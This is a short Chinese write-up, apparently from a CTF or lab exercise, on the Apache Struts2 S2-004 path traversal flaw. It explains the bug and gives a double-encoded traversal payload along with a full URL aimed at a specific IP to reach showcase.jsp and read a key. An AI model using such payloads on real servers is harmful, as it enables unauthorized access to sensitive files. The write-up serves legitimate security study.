1.在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“…/”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。
利用方法为:/struts/…%252f…%252f…%252f…%252f 改变目录可以看到各目录下的文件列表(对…/ 进行二次编码之后可以去越权访问敏感数据)。
2.根据提示key在文件showcase中,在遍历中发现文件showcase.jsp,打开此文件,在网页最下面得到key。
http://219.153.49.228:41632/struts/…%252f…%252f…%252f…%252f…%252f…%252fshowcase.jsp
Apache Struts2远程代码执行漏洞(S2-004)复现
最新推荐文章于 2024-08-07 15:16:36 发布